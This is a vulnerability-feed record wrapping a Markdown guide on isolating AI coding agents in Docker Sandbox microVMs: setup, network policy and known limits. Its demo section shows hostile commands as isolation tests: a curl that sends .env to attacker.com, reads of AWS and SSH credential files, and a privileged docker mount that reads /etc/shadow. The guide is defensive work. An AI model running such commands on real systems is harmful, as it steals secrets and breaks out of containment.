{"uuid": "1e147309-d395-41b0-b54e-15db494294f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://gist.github.com/Sagar2366/6b01a07e54bbccfeb747b6ee441b17f4", "content": "# Secure AI Coding Agents with Docker Sandboxes\n\n> By Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador\n\n---\n\n## Why This Matters\n\n- 25% of production code is now AI-authored\n- Developers using agents merge 60% more PRs\n- Agents run with YOUR credentials, filesystem, and network access\n- Your laptop is the new prod \u2014 with zero security boundaries\n\n**This isn't hypothetical.** NVIDIA's AI red team published CVE-2024-12366 \u2014 a documented case of AI-generated code escalating into remote code execution when there's no proper isolation. Two security tools (Trivy, KICS) were supply-chain-compromised in Q1 2026 via stolen credentials.\n\nThe tradeoff AI agents have imposed: limit access and the agent becomes not-so-autonomous. Give full access and it's a security nightmare. Docker Sandboxes breaks that compromise \u2014 full autonomy inside hard boundaries.\n\n---\n\n## What Are Docker Sandboxes?\n\nGive your AI agent its own **burner laptop**. It can install whatever it wants, spin up containers, do damage inside \u2014 your actual machine stays completely untouched.\n\nEach sandbox is an isolated microVM with its own kernel, Docker daemon, filesystem, and network stack. On Mac, that's Apple's Virtualization Framework. On Windows, Hyper-V. Actual hypervisor-level isolation.\n\n**You don't need Docker Desktop.** The `sbx` CLI is standalone.\n\n### How they work\n\n`sbx run claude` \u2192\n1. Boots a microVM with a dedicated kernel\n2. Mounts only your project workspace (read-write)\n3. Starts an isolated Docker daemon inside\n4. Routes all network through a policy-enforcing proxy\n5. 
Injects credentials at proxy level \u2014 never visible inside the sandbox\n6. Launches agent in full autonomous mode (no permission prompts)\n\n### Four layers of isolation\n\n| Layer | What it does |\n|-------|-------------|\n| VM isolation | Separate kernel \u2014 can't touch yours |\n| Private Docker | Agent builds/runs containers with zero visibility into host Docker |\n| Network isolation | Can't reach localhost or other sandboxes; outbound goes through filtering proxy |\n| Filesystem isolation | Only workspace syncs; ~/.ssh, ~/.aws, other projects invisible |\n\n### Why not containers?\n\nDocker started with containers for this but moved away:\n\n- **Shared kernel** \u2014 kernel exploit inside container hits your host OS\n- **Docker-in-Docker problem** \u2014 agents need Docker access. Options: privileged mode (tears down isolation) or mount host socket (gives full access to everything). Both bad.\n\nMicroVMs solve both: dedicated kernel + private Docker daemon.\n\n---\n\n## Setup\n\n```bash\n# Install (macOS)\nbrew install docker/tap/sbx\n\n# Install (Windows \u2014 enable HypervisorPlatform first)\nwinget install -h Docker.sbx\n\n# Install (Linux)\nsudo apt-get install docker-sbx\nsudo usermod -aG kvm $USER && newgrp kvm\n\n# Login\nsbx login\n\n# Store API key (saved in OS keychain, never in sandbox)\nsbx secret set ANTHROPIC_API_KEY\n```\n\nFirst login prompts for a network policy: **Open** | **Balanced** (recommended) | **Locked Down**\n\n---\n\n## Running Agents\n\n```bash\ncd ~/projects/my-app\nsbx run claude          # Claude Code\nsbx run codex           # OpenAI Codex\nsbx run copilot         # GitHub Copilot\nsbx run gemini          # Gemini CLI\nsbx run kiro            # Kiro\nsbx run shell           # Plain shell (for demos)\n```\n\nAgent starts in YOLO mode \u2014 no permission prompts. 
It can only see `/workspace/`.\n\n### Key commands\n\n| Command | What it does |\n|---------|-------------|\n| `sbx` | TUI dashboard (status, network, firewall) |\n| `sbx ls` | List sandboxes |\n| `sbx exec  -- bash` | Shell into running sandbox |\n| `sbx stop ` | Pause |\n| `sbx rm ` | Destroy |\n| `sbx policy ls` | View network rules |\n| `sbx policy log` | Audit: allowed + blocked requests |\n| `sbx policy allow network -g ` | Allowlist a domain |\n| `sbx ports publish  3000` | Forward port to host |\n| `sbx run claude --branch feature-x` | Git worktree isolation |\n| `sbx secret set ` | Store credential |\n| `sbx save` | Snapshot as template |\n\n---\n\n## The Workflow\n\n1. `sbx run claude` \u2014 agent starts in isolated microVM\n2. Turn it loose on any task \u2014 it works autonomously\n3. Changes sync to your real project directory (bidirectional, paths preserved)\n4. `sbx policy log` \u2014 see everything it did\n5. `sbx rm` \u2014 sandbox gone, code stays\n\nThe sandbox is invisible to `docker ps`. It's a separate management plane.\n\n---\n\n## Demos\n\n### Filesystem isolation\n\n```bash\n# Inside sandbox\nls -la ~/\n# \u2192 Almost nothing. No .aws, no .ssh, no personal files.\n\n# On your host\nls -la ~/\n# \u2192 Everything. 
All your secrets, all your files.\n```\n\n### Network policy enforcement\n\n```bash\n# ping-test.sh tries to reach an external IP\n./ping-test.sh\n# \u2192 ping: command not found (not pre-installed)\n\napt-get install -y iputils-ping\n./ping-test.sh\n# \u2192 Network is unreachable \u2014 BLOCKED by policy\n\n# Check audit log from host\nsbx policy log\n# \u2192 Shows: 3 blocked attempts to 198.51.100.1 (matches -c 3 in script)\n```\n\n### Credential exfiltration\n\n```bash\ncat ~/.aws/credentials        # \u2192 No such file\ncat ~/.ssh/id_rsa             # \u2192 No such file\ncurl https://attacker.com/exfil -d \"$(cat .env)\"  # \u2192 BLOCKED + logged\n```\n\n### Docker socket escape\n\n```bash\ndocker ps                     # \u2192 Sandbox containers only\ndocker run -v /:/host --privileged alpine cat /host/etc/shadow\n# \u2192 Shows sandbox FS, not host. Host unreachable.\n```\n\n### Port forwarding\n\n```bash\n# Inside sandbox: start a server\nnpm install && npm run dev -- --host 0.0.0.0 --port 3000\n\n# From host: forward the port\nsbx ports publish  3000\n\n# Open http://localhost:3000 \u2014 app visible in browser\n```\n\n---\n\n## Local Models (LM Studio / Ollama)\n\n```bash\n# Allow sandbox to reach local model server\nsbx policy allow network -g localhost:1234\n\n# Create and run sandbox with local model\nsbx create --name codex-local codex .\nsbx exec codex-local -- codex \\\n  --provider openai \\\n  --model  \\\n  --api-url http://host.docker.internal:1234/v1\n```\n\nLocal models are less capable \u2014 MORE likely to make mistakes. Sandboxing them is arguably more important than sandboxing frontier models.\n\n---\n\n## Customization\n\nSandbox VM is built from a Dockerfile. 
Customize your tooling:\n\n```dockerfile\nFROM ubuntu:24.04\nRUN apt-get update && apt-get install -y git curl nodejs npm \\\n    && npx playwright install --with-deps chromium\n```\n\nTeach agents to use custom tools via project skills (`CLAUDE.md`, `.cursorrules`).\n\n---\n\n## What the Sandbox Does NOT Protect\n\nYour **project files are fully writable**. The agent CAN delete or overwrite your code.\n\nThe sandbox protects your **system**. It does NOT protect your **project**.\n\n**Mitigation:** Commit often. Use `--branch` mode for risky tasks.\n\n---\n\n## Resource Overhead\n\n| | Container | Docker Sandbox |\n|--|-----------|----------------|\n| Disk | ~tens of MB | ~5\u20136 GB |\n| Memory | Shared | 4 GB per sandbox |\n\nRunning multiple agents in parallel adds up fast. Only sandbox agents that need guardrails.\n\n---\n\n## AI Governance (Enterprise)\n\n| Control | What it governs |\n|---------|----------------|\n| Sandbox Policy | Network + filesystem rules |\n| Credential Governance | Session-scoped tokens, exfiltration blocking |\n| MCP Tool Governance | Approved servers only |\n| Role-Based Policy | SAML/SCIM, team-specific rules |\n| Audit & Visibility | Every action logged \u2192 SIEM |\n\n---\n\n## Takeaway: The 3Cs\n\n| C | Principle | How |\n|---|-----------|-----|\n| **Contain** | Limit what agents reach | `sbx run` (microVM) |\n| **Control** | Govern what agents do | Network + MCP policies |\n| **Clarity** | See what agents did | `sbx policy log` |\n\n---\n\n## Known Gotchas\n\n| Issue | Workaround |\n|-------|------------|\n| ~5-6 GB disk per sandbox | Only sandbox what needs guardrails |\n| 4 GB memory per sandbox | Watch resources with multiple agents |\n| No SSH-agent/1Password | Unsigned commits \u2192 rebase-sign locally |\n| macOS requires Apple Silicon | Intel not supported |\n| Windows support experimental | Use at own risk |\n| Linux: container-based (weaker) | microVM only on Mac/Windows |\n| Env var change = 
recreate sandbox | Loses conversation history |\n| Project files fully writable | Commit early, push often |\n\n---\n\n*Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador | @SagarUtekar*\n", "creation_timestamp": "2026-05-29T18:31:33.000000Z"}